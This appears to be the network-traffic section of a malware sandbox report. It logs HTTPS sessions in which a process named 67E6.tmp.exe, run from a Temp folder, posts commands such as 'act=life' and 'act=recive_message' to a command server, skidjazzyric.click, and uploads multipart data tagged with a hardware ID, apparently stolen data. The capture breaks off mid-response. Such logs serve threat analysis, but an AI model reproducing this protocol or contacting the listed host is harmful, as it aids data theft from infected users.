                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-09 07:34:15 UTC265OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 8
                                                                                                      Host: skidjazzyric.click
                                                                                                      2025-01-09 07:34:15 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                      Data Ascii: act=life
                                                                                                      2025-01-09 07:34:15 UTC1133INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 09 Jan 2025 07:34:15 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=q8ti3jjmq5hnlbipd38mfqvev3; expires=Mon, 05 May 2025 01:20:54 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hhjiVG7%2FnZ1Sx6El6BZOmTxmMf3tGVv3wcGwb8DowTSpAYhHzX2f7Q%2FOnRGUnHvZC3wxqQ3D%2BlZfwztp%2FoO%2F4QX046124CFnskkgx%2B6DrvNAMBzJ5gR4ABcDYI6Lof98b68PuLI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ff2be6aa8bc8c15-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1752&rtt_var=680&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3057&recv_bytes=909&delivery_rate=2373983&cwnd=239&unsent_bytes=0&cid=147a92a8eff20959&ts=369&x=0"
                                                                                                      2025-01-09 07:34:15 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                      Data Ascii: 2ok
                                                                                                      2025-01-09 07:34:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.449733104.21.48.14437076C:\Users\user\AppData\Local\Temp\67E6.tmp.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-09 07:34:16 UTC266OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 74
                                                                                                      Host: skidjazzyric.click
                                                                                                      2025-01-09 07:34:16 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
                                                                                                      2025-01-09 07:34:16 UTC1131INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 09 Jan 2025 07:34:16 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=9svvc38uh8udnunfnnl44f3mc0; expires=Mon, 05 May 2025 01:20:55 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C0X9pYfwvRLEMi%2FFvulh9XFzN8%2FvQKUbtaFVWx83zQGpD7%2BqNsTlhmJxBCe3vuW2hNF5MYDskhx%2BDGWbBeIacckN5H2mTSM3HSH7GmyTHy1tI207X7ddotXTZZDhj%2B5kmM9bSpI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ff2be715d688c15-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1761&rtt_var=672&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3058&recv_bytes=976&delivery_rate=2419889&cwnd=239&unsent_bytes=0&cid=c40204b924072b85&ts=488&x=0"
                                                                                                      2025-01-09 07:34:16 UTC238INData Raw: 31 34 37 38 0d 0a 36 44 45 31 30 50 66 76 48 6d 4c 30 44 44 34 61 67 55 57 58 57 59 54 38 76 39 49 76 36 4e 53 58 49 61 53 63 4f 67 37 46 59 30 6d 54 45 30 50 79 7a 64 73 79 51 49 64 70 48 43 44 31 4e 2b 49 38 71 4e 37 65 74 67 33 53 73 76 5a 4e 31 2f 6b 57 4c 4c 4d 4f 61 39 4a 58 56 4c 79 45 69 6a 4a 41 6b 58 51 63 49 4e 6f 2b 74 54 7a 71 33 6f 58 77 53 6f 4b 32 39 6b 33 47 2f 56 46 68 74 51 38 71 67 46 31 53 75 4a 4b 4d 65 67 4f 59 59 56 74 2f 35 43 54 39 4e 2b 32 52 31 37 38 4e 78 50 62 79 57 34 61 6d 47 45 4f 67 46 79 69 6c 55 45 61 37 31 5a 49 79 47 64 5a 70 55 44 69 37 5a 2f 59 38 35 70 44 5a 74 6b 53 41 76 50 39 46 78 2f 68 51 66 71 77 46 49 59 42 54 55 62 6d 59 68 57 34 4f 6b 6d 5a 51 65 65 34 6b
                                                                                                      Data Ascii: 14786DE10PfvHmL0DD4agUWXWYT8v9Iv6NSXIaScOg7FY0mTE0PyzdsyQIdpHCD1N+I8qN7etg3SsvZN1/kWLLMOa9JXVLyEijJAkXQcINo+tTzq3oXwSoK29k3G/VFhtQ8qgF1SuJKMegOYYVt/5CT9N+2R178NxPbyW4amGEOgFyilUEa71ZIyGdZpUDi7Z/Y85pDZtkSAvP9Fx/hQfqwFIYBTUbmYhW4OkmZQee4k
                                                                                                      2025-01-09 07:34:16 UTC1369INData Raw: 74 58 57 6d 6d 63 58 77 46 63 72 6c 78 30 44 58 37 30 31 68 74 77 64 72 6c 52 31 4f 38 70 4b 42 50 46 6a 57 5a 6c 42 32 35 69 54 36 50 4f 65 65 7a 37 39 4e 69 62 37 39 52 38 7a 78 56 32 4f 70 43 79 79 43 57 6c 43 39 6b 6f 56 36 44 35 55 75 45 6a 6a 6b 50 37 56 6a 70 72 37 4e 73 30 36 65 75 2b 51 44 32 62 42 42 4c 4b 41 4e 61 39 49 54 55 62 79 55 67 48 77 53 6e 6d 56 58 66 66 45 73 2f 44 62 72 6e 74 43 36 51 6f 6d 32 38 6b 6e 4d 38 56 4a 6f 71 67 77 74 69 6c 4d 58 2f 4e 57 4b 5a 45 44 4f 4c 6e 39 39 38 79 44 35 4c 61 53 6b 6e 61 38 44 6b 2f 62 79 54 34 61 6d 47 47 53 69 41 69 69 42 58 46 53 36 6e 70 39 38 45 70 42 6a 57 57 72 6c 49 76 73 78 35 59 7a 58 76 6b 75 4a 76 2f 35 4b 77 2f 6c 63 4c 4f 6c 42 4c 4a 49 54 44 2f 4b 30 67 48 63 4d 6e 48 6c 63 4f 50 78
                                                                                                      Data Ascii: tXWmmcXwFcrlx0DX701htwdrlR1O8pKBPFjWZlB25iT6POeez79Nib79R8zxV2OpCyyCWlC9koV6D5UuEjjkP7Vjpr7Ns06eu+QD2bBBLKANa9ITUbyUgHwSnmVXffEs/DbrntC6Qom28knM8VJoqgwtilMX/NWKZEDOLn998yD5LaSkna8Dk/byT4amGGSiAiiBXFS6np98EpBjWWrlIvsx5YzXvkuJv/5Kw/lcLOlBLJITD/K0gHcMnHlcOPx
                                                                                                      2025-01-09 07:34:16 UTC1369INData Raw: 6f 7a 52 75 6b 75 46 75 2f 6b 44 69 4c 35 66 64 4f 64 5a 61 36 42 51 51 37 47 66 7a 30 6b 44 6d 47 42 62 62 71 4d 34 75 79 4b 6d 6d 64 48 77 46 63 71 37 39 45 76 41 37 46 64 68 70 41 38 6c 68 56 5a 59 75 70 57 4e 63 51 57 53 5a 56 64 37 37 69 50 6e 4d 65 61 57 32 4c 46 48 67 50 61 37 41 38 48 6d 47 44 54 6e 4d 44 79 42 45 57 4b 78 6d 34 4e 37 46 74 5a 78 45 6d 47 6a 49 50 6c 37 76 74 37 51 75 45 69 50 75 66 52 4a 79 50 74 53 59 4b 38 50 4b 4a 68 63 55 37 4b 5a 68 58 59 4e 6d 47 70 55 63 65 67 73 38 7a 76 6e 6c 4a 33 2b 44 59 32 75 74 52 75 47 79 6c 39 67 71 67 35 70 76 31 42 5a 76 4a 4b 62 50 42 2f 59 64 78 78 2f 37 32 65 74 65 2b 71 58 33 62 74 48 6a 72 62 79 54 73 50 39 58 32 2b 71 42 69 47 45 56 46 4f 2b 6e 49 42 36 41 4a 46 71 57 57 72 6d 4c 76 6b 33
                                                                                                      Data Ascii: ozRukuFu/kDiL5fdOdZa6BQQ7Gfz0kDmGBbbqM4uyKmmdHwFcq79EvA7FdhpA8lhVZYupWNcQWSZVd77iPnMeaW2LFHgPa7A8HmGDTnMDyBEWKxm4N7FtZxEmGjIPl7vt7QuEiPufRJyPtSYK8PKJhcU7KZhXYNmGpUcegs8zvnlJ3+DY2utRuGyl9gqg5pv1BZvJKbPB/Ydxx/72ete+qX3btHjrbyTsP9X2+qBiGEVFO+nIB6AJFqWWrmLvk3
                                                                                                      2025-01-09 07:34:16 UTC1369INData Raw: 59 4e 6c 66 6a 73 41 38 48 79 47 44 54 6e 43 43 4b 59 58 56 6d 37 6d 49 74 30 42 35 68 6a 56 33 37 6f 49 50 49 39 36 35 62 51 74 55 36 4c 73 76 39 52 78 66 56 53 59 61 31 42 5a 63 70 55 54 2f 4c 4e 7a 56 73 4d 76 33 35 48 61 76 56 6e 36 6e 58 2f 33 74 71 38 44 64 4c 32 39 6b 7a 50 38 56 42 6b 71 41 34 76 68 46 56 52 76 35 43 43 64 68 4b 65 59 46 46 7a 37 43 7a 6e 4f 2b 75 61 30 62 52 46 67 62 79 31 44 59 62 35 51 43 7a 2f 51 52 36 48 58 46 65 78 67 38 31 6a 54 6f 38 75 57 33 53 6a 66 37 55 33 36 4a 37 53 76 45 47 42 76 76 52 50 79 50 6c 64 5a 61 38 4a 4f 59 74 58 58 37 4f 62 67 6e 30 45 6b 32 74 59 66 2b 63 68 2b 6e 75 6f 33 74 71 6f 44 64 4c 32 32 6d 54 7a 76 48 6c 57 35 78 35 6c 6b 78 4e 51 76 74 58 56 50 41 79 56 59 6c 52 33 35 53 37 35 4d 65 2b 56 30
                                                                                                      Data Ascii: YNlfjsA8HyGDTnCCKYXVm7mIt0B5hjV37oIPI965bQtU6Lsv9RxfVSYa1BZcpUT/LNzVsMv35HavVn6nX/3tq8DdL29kzP8VBkqA4vhFVRv5CCdhKeYFFz7CznO+ua0bRFgby1DYb5QCz/QR6HXFexg81jTo8uW3Sjf7U36J7SvEGBvvRPyPldZa8JOYtXX7Obgn0Ek2tYf+ch+nuo3tqoDdL22mTzvHlW5x5lkxNQvtXVPAyVYlR35S75Me+V0
                                                                                                      2025-01-09 07:34:16 UTC903INData Raw: 31 38 55 62 4a 2f 31 6c 71 74 51 59 69 6d 46 31 61 76 5a 32 46 64 51 47 53 61 31 46 2b 37 79 33 30 50 4f 69 51 31 66 41 44 79 72 48 74 41 35 36 2b 65 58 79 38 45 7a 32 48 63 6c 71 39 31 5a 49 79 47 64 5a 70 55 44 69 37 5a 2f 77 70 34 70 50 50 75 55 71 45 75 66 5a 52 78 2f 4e 54 66 71 41 4f 4c 34 31 66 55 62 32 54 6a 48 6b 4b 6d 6d 6c 5a 63 2b 77 72 74 58 57 6d 6d 63 58 77 46 63 71 59 2f 6c 44 52 2f 56 5a 6e 73 52 70 72 6c 52 31 4f 38 70 4b 42 50 46 6a 57 62 56 64 7a 35 79 66 35 4f 2b 4b 54 33 61 4a 43 6a 62 48 38 53 4e 54 30 58 32 75 73 43 53 43 46 56 55 57 2b 6d 35 39 35 45 6f 51 75 45 6a 6a 6b 50 37 56 6a 70 71 6a 61 6f 46 32 4a 39 4d 52 56 78 65 68 54 59 61 74 42 4e 4d 52 4b 46 37 57 5a 7a 53 52 41 6b 47 46 56 65 2b 77 6d 2f 44 66 72 6d 39 53 31 54 49
                                                                                                      Data Ascii: 18UbJ/1lqtQYimF1avZ2FdQGSa1F+7y30POiQ1fADyrHtA56+eXy8Ez2Hclq91ZIyGdZpUDi7Z/wp4pPPuUqEufZRx/NTfqAOL41fUb2TjHkKmmlZc+wrtXWmmcXwFcqY/lDR/VZnsRprlR1O8pKBPFjWbVdz5yf5O+KT3aJCjbH8SNT0X2usCSCFVUW+m595EoQuEjjkP7VjpqjaoF2J9MRVxehTYatBNMRKF7WZzSRAkGFVe+wm/Dfrm9S1TI
                                                                                                      2025-01-09 07:34:16 UTC1369INData Raw: 33 38 31 38 0d 0a 38 46 56 71 70 67 41 6a 67 6c 4e 52 75 4a 47 4f 64 51 4f 52 5a 31 70 7a 34 43 33 36 50 4f 43 61 33 62 74 4b 68 4c 44 77 53 4d 2b 2b 46 69 79 67 47 57 76 53 45 33 47 52 68 35 39 4f 44 70 56 31 48 47 65 74 50 72 55 38 36 74 36 46 38 45 61 43 75 65 64 47 7a 2f 5a 63 5a 61 63 46 49 59 64 55 56 37 65 59 69 48 67 4f 6b 6d 6c 63 64 4f 77 67 2f 54 54 69 6e 74 4c 77 41 38 71 78 37 51 4f 65 76 6e 68 6e 73 53 41 6c 67 55 45 58 72 64 75 55 50 41 65 61 4c 67 51 34 37 53 37 30 4d 2b 69 53 31 62 52 66 69 72 33 38 54 4d 66 78 57 47 2b 6d 43 79 4f 59 56 56 65 35 6e 59 70 30 42 4a 68 38 58 58 65 6a 61 62 55 38 2f 74 36 46 38 48 79 63 73 66 4a 4d 68 4e 64 66 64 36 59 4c 4b 49 46 66 46 36 33 62 6c 44 77 48 6d 69 34 45 4f 4f 34 72 2b 44 2f 30 6b 74 32 77 52
                                                                                                      Data Ascii: 38188FVqpgAjglNRuJGOdQORZ1pz4C36POCa3btKhLDwSM++FiygGWvSE3GRh59ODpV1HGetPrU86t6F8EaCuedGz/ZcZacFIYdUV7eYiHgOkmlcdOwg/TTintLwA8qx7QOevnhnsSAlgUEXrduUPAeaLgQ47S70M+iS1bRfir38TMfxWG+mCyOYVVe5nYp0BJh8XXejabU8/t6F8HycsfJMhNdfd6YLKIFfF63blDwHmi4EOO4r+D/0kt2wR
                                                                                                      2025-01-09 07:34:16 UTC1369INData Raw: 49 79 50 74 5a 59 4b 30 47 4a 5a 68 53 58 62 36 55 69 6e 73 4c 68 47 56 4f 63 2b 73 6b 2b 7a 50 76 6e 74 4f 77 54 49 65 32 74 51 32 47 2b 55 41 73 2f 30 45 4f 71 55 52 42 75 4e 65 75 61 78 61 63 61 56 42 75 36 43 62 32 4c 65 75 4f 6e 66 34 4e 6d 37 48 6b 41 35 37 6f 53 48 75 67 48 6d 57 54 45 31 43 2b 31 64 55 38 43 35 6c 67 55 58 50 6e 4c 76 41 7a 35 5a 76 59 75 6b 47 47 74 2f 31 4b 7a 50 74 64 61 71 30 43 4a 59 56 53 57 37 61 63 67 33 56 41 32 43 35 62 59 4b 4e 2f 74 51 33 32 6d 63 57 39 58 63 69 45 39 6c 4c 58 36 31 56 38 6f 55 4d 45 69 56 39 55 74 35 4b 64 50 42 2f 59 64 78 78 2f 37 32 65 74 65 2b 61 61 30 62 4e 4b 68 4c 6e 34 54 4d 48 31 56 32 61 70 45 79 53 50 57 31 75 36 6d 4a 39 32 43 6f 52 6e 56 58 58 74 4c 2b 63 34 70 74 43 64 74 31 58 4b 37 72
                                                                                                      Data Ascii: IyPtZYK0GJZhSXb6UinsLhGVOc+sk+zPvntOwTIe2tQ2G+UAs/0EOqURBuNeuaxacaVBu6Cb2LeuOnf4Nm7HkA57oSHugHmWTE1C+1dU8C5lgUXPnLvAz5ZvYukGGt/1KzPtdaq0CJYVSW7acg3VA2C5bYKN/tQ32mcW9XciE9lLX61V8oUMEiV9Ut5KdPB/Ydxx/72ete+aa0bNKhLn4TMH1V2apEySPW1u6mJ92CoRnVXXtL+c4ptCdt1XK7r
                                                                                                      2025-01-09 07:34:16 UTC1369INData Raw: 5a 6b 79 73 46 79 71 48 57 46 75 4d 71 35 68 2f 44 70 68 70 53 6d 6d 6a 61 62 55 30 70 73 62 6b 38 41 58 4b 69 62 73 44 33 72 34 41 4c 4a 49 43 4a 59 52 55 51 61 50 59 72 58 63 57 6c 32 4e 58 64 4b 45 6d 2b 43 76 68 33 70 50 77 53 38 72 75 70 51 32 47 2b 6b 6b 73 2f 31 46 35 30 51 59 45 35 63 58 66 59 30 36 50 4c 6b 6f 34 75 33 57 37 65 2f 54 65 68 66 41 4b 69 61 54 6e 52 63 58 6f 57 79 75 5a 50 77 75 42 58 31 53 2b 6c 49 6f 38 54 74 5a 68 48 43 44 61 5a 2f 59 70 39 4e 48 4d 70 6b 43 61 73 62 6c 4c 31 2f 4e 55 4c 4f 6c 42 5a 34 35 59 57 37 65 53 6e 54 4d 53 68 6d 56 51 62 71 38 6a 35 33 75 6f 33 73 79 37 51 70 69 34 38 67 7a 58 36 46 56 38 70 41 51 73 78 6c 74 47 76 35 6e 4e 4d 6b 43 44 5a 56 42 2b 37 6a 4b 36 4b 76 43 64 79 37 63 42 67 71 66 34 54 34 62
                                                                                                      Data Ascii: ZkysFyqHWFuMq5h/DphpSmmjabU0psbk8AXKibsD3r4ALJICJYRUQaPYrXcWl2NXdKEm+Cvh3pPwS8rupQ2G+kks/1F50QYE5cXfY06PLko4u3W7e/TehfAKiaTnRcXoWyuZPwuBX1S+lIo8TtZhHCDaZ/Yp9NHMpkCasblL1/NULOlBZ45YW7eSnTMShmVQbq8j53uo3sy7Qpi48gzX6FV8pAQsxltGv5nNMkCDZVB+7jK6KvCdy7cBgqf4T4b
                                                                                                      2025-01-09 07:34:16 UTC1369INData Raw: 30 46 7a 79 6d 5a 55 76 4a 75 4b 61 68 48 62 53 46 39 2f 35 53 54 37 4c 50 66 65 6b 2f 42 4c 79 75 36 6e 44 59 62 36 53 53 7a 2f 55 58 6e 52 42 67 54 6c 78 64 39 6a 54 6f 38 75 53 6a 69 37 64 4c 74 37 39 4e 36 46 38 41 71 45 75 2f 52 41 79 50 31 4b 66 71 45 43 50 59 6b 55 61 59 79 77 67 48 45 46 6d 47 6c 69 52 73 49 74 35 54 62 70 6d 65 4f 4f 65 70 75 78 35 51 48 67 2f 55 35 76 35 30 39 72 6b 68 4d 50 38 72 53 48 62 41 32 5a 61 52 77 32 6f 79 4f 31 59 36 61 37 30 4c 31 49 68 4c 47 33 59 73 7a 75 56 57 4f 67 51 57 58 4b 58 78 66 71 31 59 78 32 45 4a 74 68 57 7a 54 6b 50 66 4a 37 71 4e 37 54 38 42 58 4b 74 2f 39 54 79 2f 46 66 49 4b 45 50 4a 63 70 4d 47 61 76 56 6d 7a 78 59 78 53 41 63 61 71 4e 2f 74 58 7a 6f 6b 39 79 7a 51 34 6d 6b 35 30 58 46 36 46 73 72
                                                                                                      Data Ascii: 0FzymZUvJuKahHbSF9/5ST7LPfek/BLyu6nDYb6SSz/UXnRBgTlxd9jTo8uSji7dLt79N6F8AqEu/RAyP1KfqECPYkUaYywgHEFmGliRsIt5TbpmeOOepux5QHg/U5v509rkhMP8rSHbA2ZaRw2oyO1Y6a70L1IhLG3YszuVWOgQWXKXxfq1Yx2EJthWzTkPfJ7qN7T8BXKt/9Ty/FfIKEPJcpMGavVmzxYxSAcaqN/tXzok9yzQ4mk50XF6Fsr


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.449734104.21.48.14437076C:\Users\user\AppData\Local\Temp\67E6.tmp.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-09 07:34:17 UTC284OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=CNN0JY6VKU6T6HGADN
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 18158
                                                                                                      Host: skidjazzyric.click
                                                                                                      2025-01-09 07:34:17 UTC15331OUTData Raw: 2d 2d 43 4e 4e 30 4a 59 36 56 4b 55 36 54 36 48 47 41 44 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 38 35 31 31 33 37 41 31 35 39 41 43 32 42 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 43 4e 4e 30 4a 59 36 56 4b 55 36 54 36 48 47 41 44 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 4e 4e 30 4a 59 36 56 4b 55 36 54 36 48 47 41 44 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 43
                                                                                                      Data Ascii: --CNN0JY6VKU6T6HGADNContent-Disposition: form-data; name="hwid"80851137A159AC2BD0632DF0E28DC412--CNN0JY6VKU6T6HGADNContent-Disposition: form-data; name="pid"2--CNN0JY6VKU6T6HGADNContent-Disposition: form-data; name="lid"4h5VfH----C
                                                                                                      2025-01-09 07:34:17 UTC2827OUTData Raw: 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af
                                                                                                      Data Ascii: 5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
                                                                                                      2025-01-09 07:34:18 UTC1137INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 09 Jan 2025 07:34:18 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=fm9cr2io52p72n5aoc5o5d6tmg; expires=Mon, 05 May 2025 01:20:57 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vxvF0lMJk%2Brm37Oy%2Fv4%2BrA6LZ1d1171wV0A%2BHU59EFBsGbJwTwcxtX91fp87BILbPJCSnXdGLVig0xQCRpP9%2FYHKJzku5IzZs7KFR0ALL6cWSZ8SeIst7afvxDI%2FYHkXHhjtonw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ff2be789ce0c461-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1615&rtt_var=619&sent=11&recv=22&lost=0&retrans=0&sent_bytes=3057&recv_bytes=19122&delivery_rate=2624325&cwnd=229&unsent_bytes=0&cid=d8f83291aea2cf4b&ts=637&x=0"
                                                                                                      2025-01-09 07:34:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2025-01-09 07:34:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.449735104.21.48.14437076C:\Users\user\AppData\Local\Temp\67E6.tmp.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-09 07:34:19 UTC274OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=UYLN8LW9R
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 8725
                                                                                                      Host: skidjazzyric.click
                                                                                                      2025-01-09 07:34:19 UTC8725OUTData Raw: 2d 2d 55 59 4c 4e 38 4c 57 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 38 35 31 31 33 37 41 31 35 39 41 43 32 42 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 55 59 4c 4e 38 4c 57 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 59 4c 4e 38 4c 57 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 55 59 4c 4e 38 4c 57 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                      Data Ascii: --UYLN8LW9RContent-Disposition: form-data; name="hwid"80851137A159AC2BD0632DF0E28DC412--UYLN8LW9RContent-Disposition: form-data; name="pid"2--UYLN8LW9RContent-Disposition: form-data; name="lid"4h5VfH----UYLN8LW9RContent-Dispositi
                                                                                                      2025-01-09 07:34:19 UTC1129INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 09 Jan 2025 07:34:19 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=l2k0lfc2vjprmm6gfmp5jo6f9e; expires=Mon, 05 May 2025 01:20:58 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
